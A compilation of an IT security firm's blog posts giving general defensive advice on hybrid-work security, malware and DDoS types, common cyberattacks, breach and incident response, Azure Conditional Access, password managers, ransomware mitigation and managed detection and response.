Securing The Hybrid Workspace

With a more distributed workforce, your organization is exposed to a series of new threats. Everything must be monitored to ensure that if anything goes wrong, the issue does not lead to a massive data breach in your business.

Keeping your hybrid office setup safe can be challenging. By taking the time to understand the challenges early and addressing them before they become security emergencies, you will be saving your business a ton of money.

Secure access

Making sure that your team not only has a VPN to use, but also that they know how to use it properly is a critical first step in protecting your hybrid office setup. The best systems use an automated approach where team members utilize preconfigured devices that will not login to your network without proper authentication. These setups are crucial because they give you more control over the protocols that are in place and remove human error from the process.

Strict access control for employees

There is a need for strict access control for anyone who needs to use the network. At the basic level, you need two-factor authentication or multi-factor authentication. On top of strong authentication practices, you should implement role-based access control (RBAC) to make sure that if anything does happen, you will be able to mitigate the damage inflicted on your IT assets.

With RBAC, employees can only access files that are critical to their roles. This makes it harder for hackers to gain full access to business data. Also, even if they get access, their possibilities will be limited.

Disaster recovery and backup services

This is imperative for basically every organization, regardless of their office structure. A robust backup and recovery plan is something that could potentially save your organization numerous times. It doesn’t just help you stop hackers from stealing your business data, because you can erase everything and restore from the backup, but it also protects it against natural disasters.

You need to make sure that you keep a full disaster recovery plan in place to cover any potential problems that can come up.

Network monitoring

Strong network monitoring practices help you catch problems before they become serious threats. With network monitoring, you are watching your network for anything unusual, suspicious activities, malicious code, or unauthorized access. When you take a proactive approach, you start noticing little things that might take down your network and you will be able to stop them in a timely manner.

Patch management

Keeping work-related devices up to date can be a simple way to reduce potential attack vectors. The challenge is that patch management can become a monumental task as your business and workforce evolve.

Patching your software regularly is mandatory because it will address security issues that exist in your system. These security issues can be exploited by perpetrators to gain unauthorized access to your network.

DNS Filtering

When your employees are working from home and are outside of the protection of the corporate firewall, a DNS filtering solution can help prevent a malware infection keeping your corporate data and your employees’ devices safe. By redirecting users’ web traffic through a cloud-based, DNS security solution, businesses can enforce web access policies, block malicious websites, ensure regulatory compliance, and stop threats at the network’s edge.

Mobile Device Management (MDM)

MDM is hugely important with distributed workforces. It allows you to monitor and manage the devices your staff utilizes. If something suspicious occurs, you can lock down and wipe the device before hackers have a chance to access the data (or your network). Mobile Device Management will ensure that any device used by employees is as secure as possible. This helps a lot, especially if you have a bring your own device policy in place.

IT Security Training

Creating good habits is crucial when it comes to hybrid workforce. It is not enough to simply install security software and monitor your network. You need to make sure that your staff knows what good security practices look like. That’s where training sessions come in. You can’t rely on people reading through documentation and remembering everything.

Security training gives you and your team hands-on experience that helps you learn the best security practices. It includes security drills, like sending out fake phishing emails to employees to make sure the training sticks. All it takes is one employee not paying attention when they check their email to compromise your entire organization.

Looking for help securing your hybrid workspace?

We have been helping organizations secure their offices for more than 16 years and have the skill set necessary to implement strong remote working practices. We can also train your team on the best IT security practices and help create good habits that are going to keep your company safe.

As the world adapts to new ways of working, the security needs of these setups are slightly different from the needs of the traditional office structure and will continue to evolve.

Most Common Types Of Malware

Malware uses a vulnerability to breach a network when a user clicks a dangerous link or downloads/opens an email attachment, common methods used to install malicious software inside the system. The term malware includes various types of threats including spyware, viruses, and worms.

Malware and malicious files inside a computer system can:

  • Deny access to certain network components.
  • Obtain sensitive information from the hard drive.
  • Make the system inoperable.

Types of Malware

Ransomware is an increasingly popular type of malware that denies access to the victim’s data, threatening to publish or delete it unless a ransom is paid. Advanced ransomware uses cryptoviral extortion, encrypting the victim’s data and making decryption impossible without the decryption key.

Viruses attach themselves to executable code or associate themselves with files by creating a malicious file with the same name but with an .exe extension.

Worms are often installed through email attachments, sending copies of their source code to every contact in the infected computer email list. Unlike viruses, they do not attack the host, being self-contained programs that spread across networks and devices. Worms are frequently utilized to overburden email servers to conduct denial-of-service attacks.

Trojans are programs hiding inside other programs for malicious purposes. Unlike viruses, a trojan does not replicate itself and it is commonly used to establish a backdoor that can be exploited by hackers.

Spyware is what we call a software installed to collect data about users, their systems or browsing history, sending the captured data to a hacker. The attacker can then use the information for blackmailing purposes or to download and install other malicious programs.

Keyloggers are similar to spyware, except that they track the victim’s activity. Everything the victim types in is sent to the hacker and can eventually be used for blackmail or identity theft.

Which devices can be affected?

No device is immune to malware.

Also, both Android and iOS mobile devices can be infected with malware. Many types of mobile-specific malware are spread via SMS, besides the standard email vectors.

Common symptoms of malware infection

The most common signs that your device has been compromised by malware are:

  • Slow device performance.
  • URL redirections, basically the user is redirected to websites he/she did not intend to visit.
  • Infection warnings, frequently along with requests to buy some software solutions to fix them.
  • Problems shutting down or restarting your device.
  • Frequent pop-up ads.

The more of these common symptoms you see, the higher the likelihood your device was infected.

How to protect your data against malware

Even though there are a lot of types of malware out there, there are solutions and tips your staff can implement to protect your business against such threats.

Protect your devices.

Keep your operating system and applications updated. Hackers look for vulnerabilities in old or outdated software, so make sure you install updates as soon as they become available.

Never click on a link in a popup. Just close the window and never revisit the website that generated it.

Only install apps you need and use regularly. If you no longer use an app, it is advisable to uninstall it.

Use a mobile security solution. Malware and adware campaigns are getting increasingly popular, so make sure your mobile devices are protected against such threats by utilizing a top-tier mobile security solution.

Do not lend out your smartphone or leave your computer unattended. Also, in case your default settings have been changed, or a new app has mysteriously appeared, this might be proof that spyware or a keylogger has been enabled.

Avoid clicking unknown links. Whether it comes via email, a social account, or a text message, if a link seems suspicious, stay away from it.

Only use known and trusted websites. So, avoid risky websites, such as non-HTTPS websites.

Keep an eye on emails requesting personal information. If an email appears to come from your bank and instructs you to click a link to reset your password or access your account, do not click it. Go directly to your online banking website/app and log in there.

Pay extra attention to downloads and other software purchases.

Make sure you purchase security software from respectable companies using their official stores.

Don’t utilize jailbroken or rooted devices, in order not to put your data at risk.

When looking for your next favorite app, make sure you read app reviews first, utilize only official app stores, and if something looks fishy, it would be safer to avoid it.

If you are concerned that your device may be infected, run a scan using a security software you trust.

Do not open an unexpected email attachment, even if it came from a friend or someone you know.

With these tips and a reliable security software, you will be on your way to protecting your data and devices from all kinds of malware.

Denial-of-Service & Distributed Denial-of-Service Attacks

A denial-of-service attack overwhelms the system’s resources so that it cannot respond to service requests. A distributed denial-of-service attack is also an attack on system’s resources, but it is launched from a considerable number of other host machines that are infected by malicious software all controlled by the perpetrator.

Unlike attacks that are designed to enable the attacker to gain or increase access, denial-of-service does not provide direct benefits for attackers, unless the attacked resource belongs to a business competitor, then the benefit to the hacker is real and measurable. Another purpose of a DoS attack can be to take a system offline so that a different kind of attack can be subsequently launched.

There are several types of DoS and DDoS attacks. The most common are ping-of-death attacks, TCP SYN flood attacks, teardrop attacks, smurf attacks, and botnets.

Ping of death attacks

This type of attack uses IP packets to ping a system with a packet size of over the maximum of 65,535 bytes. IP packets of this size are not allowed, so the attacker will fragment the IP packet. Once the target system reassembles the packet, it can experience buffer overflows making the system vulnerable.

Ping of death attacks can be avoided by using a firewall that checks the total size of fragmented IP packets.

TCP SYN flood attacks

This type of cyberattack aims to make a server unavailable to legitimate traffic by consuming all available server resources. The attacker floods the target system’s connection queue with initial connection request (SYN) packets, but it does not respond when the attacked system replies to those requests. This causes the victim’s system to time out while waiting for the response from the attacker’s device, which makes the system unavailable when the connection queue fills up.

To counter such cyberattacks, you should consider setting up a firewall to stop inbound SYN packets and you can also increase the size of the connection queue while decreasing the timeout interval on open connections.

Teardrop attacks

This attack involves sending fragmented packets to a machine. The attacked system attempts to reconstruct packets during the process but fails and eventually crashes.

If you do not have patches to protect against teardrop attacks, then you should disable SMBv2, and block ports 139 and 445.

Smurf attacks

By utilizing IP spoofing and Internet Control Message Protocol (ICMP) echo requests, hackers can overwhelm a target network with traffic. These ICMP requests originate from a spoofed “victim” address. For instance, if the victim’s IP address is, the attacker would spoof an ICMP echo request from to the broadcast address This request would go to all IPs in the range, with all the responses going back to, overwhelming the network. Unfortunately, this process can be automated to generate huge amounts of fraudulent network traffic.

To protect your devices from a smurf attack, you should disable IP-directed broadcasts on the routers. This will prevent the ICMP echo broadcast request at the network devices. Another solution would be to configure the end systems to not respond to ICMP packets from broadcast addresses.


Botnets are a network of computers infected with malware under the hacker’s control. These bots are used to execute attacks against a victim’s system, often overwhelming the target system’s bandwidth and processing capabilities. These DDoS attacks are difficult to trace because botnets are located in different geographic locations.

Botnets can be mitigated by RFC3704 filtering that denies traffic from spoofed addresses and traces traffic to its correct source.

Another solution is black hole filtering, which rejects undesirable traffic before it enters a network.


NetScout Systems, a network performance software vendor, reported that in the first half of 2021, threat actors launched 5.4 million DDoS attacks. More than 50% of those were DDoS extortion attacks in the financial industry.

According to Kaspersky, in the last quarter of 2021, the total number of DoS attacks increased by 52%, compared to previous quarter, and 4.5 times higher than in Q4 of 2020.

As businesses and financial institutions evolve, it is essential to have a cybersecurity strategy in place that includes not only professional human intervention, but also automated solutions that can detect and block modern DDoS attacks.

Types Of Cybersecurity Attacks

A cyberattack is a deliberate attempt to breach the information system of an individual or an organization. Below we describe some of the most common types of cyberattacks.

Man-in-the-middle (MitM) attacks

This type of attack occurs each time a hacker gets fraudulent access to a client-server or other private communication. The most common types of man-in-the-middle attacks are the following.

Session hijacking occurs when an attacker hijacks a session between a trusted client and a server. The attacking device will replace its IP address with the one of the trusted client. If the server continues the session, the attack is successfully executed.

IP spoofing is utilized to disguise the attacker’s IP, usually with randomized numbers.  IP stands for Internet Protocol, which is the set of rules governing the format of data sent via the internet or local network. The IP address is the identifier that allows data to be sent between devices on a network: they contain location information and make devices accessible for communication.

To prevent such attacks, organizations rely on deep packet inspection (DPI) solutions, which utilize granular analysis of all headers not just the IP address.

A replay attack occurs every time a hacker intercepts and saves old communication and then reopens a discussion, impersonating one of the participants.

To counter such attacks, IT security teams utilize session timestamps and a cryptographic nonce “number only used once” which is a random number that can be used just once in a cryptographic communication.

Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks

A denial-of-service attack overwhelms a system so that it cannot respond to service requests. Similarly, a DDoS attack targets the system’s resources, but it is launched from several host machines controlled by the perpetrator.

Unlike cyberattacks that are designed to penetrate a system to get unauthorized access, DoS attacks do not provide direct benefits for attackers. However, if the targeted resource belongs to a competitor, then the benefit to the attacker can be measured.

A DoS attack can also be used to take a system offline to facilitate a different kind of attack.

There are several types of DoS attacks, such as teardrop attacks, botnets, etc.

Drive-by download attacks

Generally, the drive-by download attack is utilized for spreading malware. Hackers often look for insecure websites and exploitable vulnerabilities to include malicious scripts into HTTP or PHP code on some of the pages. These scripts might easily install malware directly onto the victim’s device if she/he visits the website, or it might redirect the victim to a second website controlled by the hackers.

A drive-by download will target an app or a web browser that is vulnerable due to lack of updates.

To protect your organization against such attacks, you should keep your browsers and operating systems up to date and avoid loading unsecure, suspicious websites.

Phishing & spear phishing attacks

Unfortunately, phishing attacks are increasingly popular among hackers. This type of cyberattack usually involves sending emails that appear to be from trusted sources with the goal of gaining personal information or influencing victims into taking certain action.

Such an attack combines social engineering and technical methods. It could be an email attachment or a link to an illegitimate website that can trick you into downloading malware or disclosing personal information.

Spear phishing is a targeted type of phishing activity. Attackers closely investigate their targets and create messages that are personal and relevant. Therefore, spear phishing can be very hard to identify and even harder to defend against.

Hackers usually utilize email spoofing for conducting spear phishing attacks. Basically, they change the sender’s email address, making it appear as if it is coming from someone you know, maybe a manager (e.g. CEO fraud) or a colleague/partner.

To reduce the risk of being phished, you should apply the following suggestions:

Analyze any email you consider suspicious.

Move your mouse over the suspicious link, but do not click it! Just move your mouse cursor over the link to see the destination URL.

Email headers define how an email got to your address. The “Reply-to” and “Return-Path” parameters should lead to the same address included in the email.

Password attacks

As we all know, passwords are the most used mechanism to authenticate to any information system. Access to a person’s password can be obtained by using social engineering, gaining access to a password database, etc.

Two of the most common password attacks are brute-force attacks and dictionary attacks.

The brute-force attack occurs when hackers or preconfigured bots try many different combinations, such as old passwords, stolen personal information, etc.

The dictionary attack involves a dictionary of common passwords that is used to attempt to gain access to a user’s computer and network.

To protect against dictionary or brute-force attacks, you should implement an account lockout policy that will block any login attempt after a few invalid user/password combinations.

SQL injection attacks

SQL injection has become a common issue with database-driven websites. It occurs when the hacker executes SQL queries to the database via input fields.

A SQL injection attack can allow the perpetrator to read information from the database, insert, update, or delete database data, execute admin operations, recover the content of a certain file, etc.

To protect your organization from a SQL injection attack, apply the least privilege model of permissions in your databases.

Cross-site scripting (XSS) attacks

XSS attacks use third-party resources to run scripts in the victim’s browser or application. The attacker injects malicious JavaScript into a website’s database. When the victim loads a web page, the server transmits the page with the attacker’s payload as part of the HTML body to the victim’s browser, which executes the malicious script. For instance, it might send the victim’s cookie to the attacker’s server, and the perpetrator can extract it and use it for session hijacking.

To defend against such cyberattacks, always make sure that you treat anything that generates data from outside your system as untrusted. Validate all the input data and create a whitelist of known, acceptable input. Examine and remove unwanted data.

Malware attacks

Malicious software can be described as unwanted software that is installed within the victim’s information system. There are many types of malware that hackers use such as: macro viruses, file infectors, polymorphic viruses, trojans, etc.


A good defense requires understanding the offense. Unfortunately, attackers have many options, such as DDoS assaults, malware infections, and brute-force password attacks trying to gain unauthorized access to business data.

Measures to mitigate these threats vary, but IT security basics stay the same. So, keep your systems and anti-virus databases up to date, regularly train your employees, configure your firewall to whitelist only the specific ports and hosts you need, keep your passwords unique and strong, use a least-privilege model in your IT environment, make regular backups, and continuously audit your IT systems for suspicious activity.

What To Do After A Data Breach?

All organizations face the risk of a data breach because of a cyberattack or another type of security incident. Recovering from such an incident could be complicated, no matter how big or small your company is, especially if sensitive data is exposed.

How To Respond To A Data Breach?

If your business is the victim of a data breach and you are wondering how to react efficiently, consider the following steps to help minimize the impact.

Contain The Security Breach

Some people might be tempted to delete as many files as possible after a data breach occurs, but preserving evidence is crucial to assess how the breach occurred to prevent it from happening again.

Firstly, try to determine which servers, applications, and/or devices have been compromised and contain them as quickly as possible to ensure that the attack does not spread and damage more assets.

To stop an attack from spreading within your network, you should disconnect the affected servers and take your network offline as quickly as possible.

Change the credentials for all your critical accounts and servers.

If your IT staff is not specialized in digital forensics you may want to hire a specialist to conduct the investigation.

Assess the Security Breach

You need to determine the root cause of the breach within your system to help prevent the same kind of attack from happening again.

If you have discovered that you are a victim of a broader attack that targeted multiple organizations, follow updates from authorities charged with monitoring the situation and report accordingly.

Key Aspects:

You need to identify who has access to the servers that were compromised, which network connections were active when the breach occurred and how was the attack initiated.

You may be able to pinpoint how the attack vector penetrated your system by checking your firewall logs, your antivirus program, the email service, or your Intrusion Detection System.

You also need to find out who may have been affected by the breach, including employees, customers, and third-party vendors.

Assess how severe the data breach was by identifying what information was targeted, such as mailing addresses, specific accounts, credit/debit card numbers, etc.

Data Breach Notification Plan

Communicate with your staff and let them know what happened. Define clear authorizations for team members to report on the issue both internally and externally. Remaining on the same page with your team is paramount while your business is recovering from a security incident.

You may need to consult with your legal team to figure out the best way to avoid a legal hassle.

If you don’t have a cybersecurity plan in place or an IT security team to handle such situations, StratusPointIT professionals can help you defend against and recover from IT security incidents.

Key Aspects:

Notify your cyber insurance provider.

When a cyber event occurs, your insurance company may have experts who will walk you through the proper response steps. Contact your insurer as quickly as possible to limit the consequences of such an attack and for planning the next steps.

Notify your customers.

Communication is key to maintaining a positive, professional relationship with your customers. Provide them with means to specifically ask questions related to the breach.

Your employees should be aware of your organization’s policies regarding data breaches. Also, consider restricting your employees’ access to sensitive data based on their job roles and regularly train them about how to prepare for a data breach and how to avoid one.

Prevention Methods

The FBI has provided additional tips that can help businesses protect themselves against cyber incidents.

Never download attachments or click links within emails received from senders you do not recognize.

Do not provide usernames, passwords, social security numbers, financial data, or other personal information in response to an email or phone call.

Avoid using the same password for multiple accounts.

Your organization must evaluate the technologies in place and invest in more up-to-date solutions to ensure best protection.

Make sure you review and update information security policies, business continuity plans, and data breach response plans.

Also, conduct frequent security checks to help reduce the likelihood of a similar incident occurring again in the future and educate your staff about data breach protocols.

A data breach can be undoubtedly stressful, but if you take the necessary steps, it can make your business better prepared next time a similar incident occurs.

How to create an incident response plan?

An incident response plan is a well-documented plan that includes a series of phases that helps IT security professionals recognize and properly react to cybersecurity incidents.

According to Gartner, the SANS Institute (founded 1989) is one of the world’s premier cybersecurity training organizations. The SANS Institute methodology includes 6 incident response phases as follows: Preparation, Identification, Containment, Eradication, Recovery, and Lessons Learned.

Within each phase, there are specific areas that should be considered. Next, we will analyze each phase and identify the items that need to be addressed.

The Preparation Phase

This phase is all about ensuring your employees are properly trained regarding their incident response roles and responsibilities in the unfortunate event of a data breach.

Make sure all aspects of your incident response plan (security training, hardware, software resources, etc.) are approved and funded in advance.

Thoroughly explain and document everyone’s roles and responsibilities. This phase must be tested to assure that your employees will perform as they were trained. The more prepared your employees are, the less likely they will make critical mistakes.

Make sure that everyone has been trained on security policies, that your incident response team know their roles and have participated in mock drills.

This is also a good time to update and patch your systems, review your remote access protocols, change all user and administrative access credentials, and harden all passwords.

The Identification Phase

During this phase the security team will determine whether your organization systems have been breached. A cybersecurity incident could originate from many different areas.

Briefly, you will acknowledge how and when the incident was discovered, also who discovered it. You will follow the necessary steps to identify the source (point of entry) of the attack vector. Then you will assess how it affects your operations.

The Containment Phase

When a breach is first discovered, people are usually tempted to securely delete everything so they can just get rid of it. This approach will likely hurt the organization in the long run because you will be destroying valuable evidence that your IT security team will need to determine where the breach started and create a plan to prevent it from happening again.

Instead, contain the breach, quarantine the malware you have identified, so it does not spread and cause further damage to your business. If you can, disconnect affected devices from the Internet.

Have short-term and long-term containment strategies in place. Keeping up-to-date backups is essential to restore your business operations.

The Eradication Phase

Once you have contained the issue, you need to find and eliminate the root cause of the breach. This means all malware should be securely removed, systems should again be patched, and updates should be applied.

Whether you do this in-house, or hire a third party to handle it, you need to be thorough. If any piece of malware or security vulnerabilities remain in your systems, you may still be losing valuable data, and the liability will only increase.

The Recovery Phase

This is the process of restoring the affected systems back to a pre-attack version. During this time, it is important to get your systems, devices, and business operations up and running again.

Make sure you monitor the situation, especially the systems/apps that were previously affected to ensure similar attacks will not reoccur by updating your security incident response plan accordingly.

Lessons Learned

Once the assessment is complete, gather all incident response team members and discuss what you have learned from the security incident. At this point you will analyze and document everything about the breach.

Documentation may be used for data breach insurance. This can save the company from prospective legal costs and fines, not to mention the brand damage associated with a data breach which can be harsh for a business, especially if the organization is a startup.

Identify what worked well in your response plan, what changes need to be applied, what weakness did the breach exploit, etc. All the lessons you learn are valuable and will strengthen your organization against future cyberattacks.

No one wants to go through a security incident, but it is essential to prepare for one. Know what to do when it happens and regularly test your plan’s efficiency. For this purpose, regularly orchestrate cyberattacks to test your organization’s incident response plan and how fast your team reacts. This habit will generate at least two important results: a deep understanding of your plan (tasks, processes) and a list of gaps that should be addressed. If there is room for improvement, all changes must be properly documented for them to have real, lasting value for your security operations team.

Azure Active Directory Conditional Access Policies

What is Conditional Access?

Azure Active Directory Conditional Access is a feature that helps businesses improve both cybersecurity and compliance. By applying such policies, organizations will refine the authentication process reducing the risk of unauthorized access.

Usually, it is the legitimate account owner typing in the username and password pair. Once logged in, the user can access all the data, applications, and business resources he/she has been granted permissions for. But sometimes, it is the attacker who tries to login with the user’s credentials, putting your organization at risk.

To reduce this risk, organizations can put additional authentication measures in place, such as multi-factor authentication (MFA) requiring the user to type the unique code sent to their mobile device, a fingerprint, etc.

This strategy is efficient. Microsoft reports that 99.9% of organization account compromise could be stopped simply by using the MFA security feature. The problem is that sometimes MFA can be insufficient, like when it is a privileged administrator accessing highly sensitive resources. In such a case, additional evidence that the authentication request is legitimate is recommended.

The Conditional Access feature helps organizations strengthen the authentication protocol. For instance, you can create a policy that requires the administrator, so not the regular users, to complete the MFA step.

You can utilize variables like the user’s location and the type of authentication protocol being used. For instance, you can block all requests that come from certain countries, allow all requests from your headquarters location, and require MFA for all the rest.

Conditional Access Policies

When creating Conditional Access policies there are several basic actions you should take, such as:

  • Verify the user’s identity during sign-in.
  • Verify the security of the device used for the connection.
  • Require MFA for users, inclusive of any administrators.
  • Implement Geo-blocking
  • Disable legacy protocols that don’t support MFA (POP, IMAP, SMTP, ActiveSync.

Improving MFA

While multi-factor authentication contributes to a more secure account, burdening users with MFA challenges is not always the best approach. If users are required to go through MFA requests each time they open their accounts, they can fall into the trap of approving challenges without verifying the legitimacy of each request. Unfortunately, this could mean that someone accidentally accepts a sign-in request generated by a hacker. Therefore, user experience is extremely important when implementing Conditional Access policies.

So, instead of challenging a user with MFA at each login, create a strategy that combines signals to verify the identity of the user, as for instance, the user’s known location. By using multiple signals before requesting MFA, this will drastically reduce the number of requests the user receives.

Business Data Protection

Conditional Access supports many features besides multi-factor authentication. Some organizations ignore the fact that anybody can install Outlook or OneDrive on a personal device, and then copy mailbox and data to that device. So, when an employee leaves, the company has no control over any data copied to these personal devices. Ensuring that users can copy business data only to company devices is crucial for compliance and security purposes.

Less is More

When the organization wants to change a policy, or the responsible team needs to investigate a sign-in, a high number of conditional access policies can make the task very challenging. Therefore, you should think about the bigger picture since the beginning of this process and combine as many conditions as possible into one policy.

Try to group policies based on different signals, such as: the type of data, type of user, and the ownership of the device.

When it comes to type of data, access to SharePoint should be stricter compared to Microsoft To-Do, which does not contain as much sensitive data.

Based on the type of user, administrator accounts need stricter policies than regular users.

The ownership of the device is very important because there is a big difference between the management of personal and corporate devices. Personal devices should not be trusted with as much data as corporate devices. The latter category usually has adequate security controls in place.

Documentation is Necessary

As the number of active policies increases, documentation becomes important. It should include details of the configuration and a description of each policy. This will help you revert the policy to the original state and remind you why it was implemented in the first place. While this might not be necessary for smaller organizations, it is mandatory for enterprises.

Besides documenting policies, be sure to document exclusions and not just mentioning the ones that are active, but more importantly: who added the exclusions and why. This way you can review the exclusions and decide whether they are still useful.

In addition to implementing multi-factor authentication in an intuitive way, Conditional Access policies can limit what files users can access or download, in certain scenarios, improving the security of your organization.

Benefits Of Using A Password Manager

We all want our sensitive data to be protected, yet some users often rely on weak passwords because memorizing complex passwords is painful. This approach is dangerous.

Unless you want to constantly safeguard a hard copy list of all your passwords, you should consider setting up a password manager. Such a solution can help you easily oversee and handle all your login credentials for any online account and maintain proper password security.

These solutions are also very handy when it comes to auto filling fields and syncing your data across PCs, Macs, iPhones, Android-powered devices, etc.

What is a Password Manager?

A password manager is basically an encrypted vault that securely stores login information used to access applications and accounts. Besides keeping your identity, credentials, and sensitive data safe, some password managers utilize a password generator to create strong, unique passwords every time. All passwords are stored in an encrypted database and locked behind a master password.

With all the recent cyber incidents, having a unique password for each account you use means that if one gets hacked, your stolen password can’t be used on other accounts. You are basically using multiple passwords to create your own security features.

A 2017 report from LastPass found that people had to remember 191 different passwords, on average, just related to their work.

While technology usually makes our lives easier, new websites and applications we sign up for involve new passwords we have to remember. It is almost impossible to remember all of them. A 2021 Last Past survey reveals that 80% of respondents were concerned about changing passwords frequently, but 48% of them stated that they won’t change their password unless it is required.

By using large lists of stolen passwords bought off the dark web, hackers can brute force their way into other websites or use old passwords to extort users. According to the 2019 Verizon Data Breach Investigations report, 80% of data breaches are caused by compromised, weak, or reused passwords.

What are the benefits of using a password manager?

Firstly, you don’t have to remember all those passwords. A password manager can securely keep them for you. Once your usernames and passwords have been entered into the vault, your master password is the only one you must remember. Entering the master password unlocks the vault, so you can then retrieve whatever password you need.  Add more security to your vault by two-factor authentication. A strong password combined with a two-step verification protocol provides the most protection.

If you choose a cloud-based password manager, then you can access your password vault from any device, anywhere.

Some password managers can securely keep more than username/password pairs. Sensitive information such as shipping addresses and credit card information can be protected too. With just one master password or a fingerprint, the user can access them and autofill web forms.

They can generate new passwords for you. Typically, you will be prompted to choose if you would like the password manager to create a password whenever you create a new account with a website or application.

They can alert you to a phishing site. Spam emails are deceptive, as they look like they are coming from a legitimate sender. Links included within such emails send the recipients to malicious websites designed to steal their sensitive data. Browser-based password managers will not auto-complete the username and password fields because they won’t recognize the website as the one tied to the password and thus protecting your data from a potential exploit.

Password managers save time. In addition to storing your passwords, some password managers also auto-fill credentials allowing you to quickly access your accounts.

There are password managers that can sync across different operating systems. For instance, if you are a Windows user at home and a Mac user at work, you will be able to quickly access your passwords regardless of which platform you are on.

Password managers help protect against identity theft. By using a unique password for every account, you are essentially improving the security of each account. If one of your accounts gets hacked, attackers won’t be able to get into any of the others.

Many robust password managers can assist in collaboration.  This feature allows you to share passwords securely, between employees or external clients.

Types of password managers

Desktop-based password managers store passwords on your device (Mac, laptop, etc.) in an encrypted vault. Usually, the user cannot access those passwords from any other device.

Cloud-based password managers store encrypted passwords on the service provider’s network. The service provider is responsible for the security of your passwords. The main benefit of cloud-based password managers is that the user can access their password vault from any device that is connected to the Internet.

Protect your data like a professional and use a password manager to keep your credentials safe and secure.

How to mitigate the risk of a ransomware attack in 2022

As you probably know, malware is a malicious software (file or code) which can:

  • lock a device or make it unusable;
  • take control of certain devices to attack the organization;
  • steal, delete, or encrypt sensitive data.

Ransomware is a type of malware that prevents the users from accessing their devices or certain files. Ransomware most likely will spread to other machines within the network, as happened with the WannaCry malware.

Usually, the victim is asked to contact the hacker via an anonymous email address or follow instructions on an obscure web page, to make a payment. To unlock the device or for being able to access the encrypted data, the payment is usually requested in a cryptocurrency.

However, even if the ransom is paid, there is absolutely no guarantee that the user will get access to the device, or the files.

Sometimes, malware may look like ransomware, but after the ransom is paid the files may not be decrypted. For this reason, it is crucial to always keep offline backups of your most important files.

Organizations must proactively protect their assets against these complex cyberattacks. Strong defenses and a resilient cyber security posture require not only technical measures but also ransomware-relevant business continuity planning.

Here are a few aspects that should be considered in order to protect your organization and its assets.

Maintain multiple versions of file not just basic backups.

Companies will need to utilize systems that can create snapshots several times a day or maintain multiple versions of file created over the course of the day, to enable a quick restoration process to a specific moment. In the unfortunate case of a cyberattack, this effort considerably minimizes the productivity loss. Also, the IT security personnel will need to routinely test the backups to ensure the data is restorable and to determine the time it takes to restore. This way the organization will estimate the downtime it will need to handle in the case of a successful ransomware attack.

Use the principle of least privilege.

Limiting the file access rights to the minimum level of permissions that users need to perform their work is extremely important. This measure will reduce the number of files that could be encrypted in the event of a ransomware attack.

Limit the risk of initial attack vectors.

Ransomware attackers need access to your system to damage it. They obtain access through phishing schemes, unpatched software, and employee password reuse. Organizations should aim to reduce the likelihood of ransomware attacks by implementing and maintaining strong vulnerability management programs, reducing their attack surface, and providing security training programs for all personnel.

Plan for an attack, even if you think it is unlikely.

Even though they were not the intended targets, there are numerous examples of companies that have been indirectly hit by malware.

Develop an internal and external communication strategy. It is important that the right information reaches the right recipients in a timely manner.

Determine how you will respond to the ransom demand and the threat of your organization’s data being published.

Ensure that your incident management plan and supporting resources are available in case your network is compromised.

Improve your incident management plan. This will help clarify the roles and responsibilities of staff and third parties and prioritize system recovery.

Use Endpoint Detection & Response (EDR)

Nowadays, attacks are expanding beyond local machines trying to block entire systems. Botnets and IoT networks can be used to increase ransomware’s affects.

Modern antivirus solutions can identify and block new types of malware. However, hackers are constantly adapting their methods. Many types of malware are untraceable by standard solutions, such as polymorphic malware which is a type of malware that constantly changes its identifiable features to avoid detection, or fileless malware, etc.

Under these circumstances, to improve cybersecurity, an IT department should implement an integrated endpoint security solution. EDR security integrates the collection, correlation, and analysis of endpoint data, as well as alerting and responding to imminent threats.

Companies must be prepared for these increasingly sophisticated types of attacks. By hiring a professional team and taking the necessary steps, you will be able to protect your IT infrastructure from modern ransomware attacks.

Managed Detection and Response

A Managed Detection and Response (MDR) security solution is a high-level 24/7/365 security control that includes a range of security activities including cloud-managed security for organizations that cannot maintain their own security operations center (SOC). MDR services combine threat intelligence, advanced analytics, and human expertise in incident investigation and response deployed at the host and network levels to help keep your organization secure.

Relevant analytics, threat intelligence, and forensic data are passed to professional analysts, who classify alerts and determine the appropriate response to reduce the effects and risk of incidents. Then, through a combination of human abilities and machine capabilities, the threat is removed, and the affected endpoint is restored to its original state.


Though Endpoint Detection and Response (EDR) solution provides you with the platform to investigate and remediate threats, it still requires human intervention. An MDR solution provides a certified team of cybersecurity professionals that will handle monitoring, incident response and remediation services to help keep your business secure. Endpoint detection and response is part of the tool set used by MDR providers.

EDR records and stores behaviors, and events on endpoints and may trigger rules-based automated responses. When a suspicious situation is identified, it is sent to the IT security team for human investigation. EDR gives security teams the ability to use more than just indicators of compromise (IoC) or signatures to understand what is happening within their networks.

Over time, the EDR tools have become more and more complex, incorporating modern technologies such as machine learning, behavioral analysis, and the ability to integrate with other complex solutions.

MDR Fundamentals


Managed Prioritization

Prioritization helps organizations that struggle daily with large volumes of alerts to determine which one should be addressed first. Managed prioritization, also known as “managed EDR”, applies a set of automated rules and human inspection to differentiate between false positives and true threats.

Threat Discovering

Behind every threat is a person who analyzes the options and decides how to avoid being caught by their targets’ countermeasures. While machines are increasingly smart, the human mind is still needed to add the missing element that no automated detection system can provide. Threat hunters with skills and expertise identify and alert on the most advanced threats in order to catch what the layers of automated protection can’t.

Managed Investigation

Managed investigation services help businesses understand threats faster by providing security alerts with additional context. Therefore, organizations can clearly understand what happened, when it happened, what was affected, and how far the attacker went. With that information at hand, they can plan and execute an effective response.

Guided Response

The guided response provides actionable advice on the best way to isolate and remediate a specific threat. Organizations are advised on activities such as whether to remove an endpoint from the network, how to eliminate a threat or recover from a cyberattack.

Recovery & Remediation

The last phase in incident response is remediation. This step is crucial as the organization’s reputation is at stake. Managed remediation will restore systems to their pre-attack state by removing malware, cleaning the registries, removing any unauthorized access and persistence mechanisms. Also, during the remediation phase, the IT security personnel will ensure that further compromise is prevented.



In-house security teams may lack the resources and the time to fully utilize their EDR systems, which can leave an organization even less secure than it was before it implemented an EDR solution. MDR solves the problem by introducing human expertise, specific processes, and threat intelligence.

MDR is designed to help organizations acquire enterprise-grade protection while avoiding the costs of building and maintaining a security operations center or hiring enterprise-level security staff.

For more information, please check our IT security services page.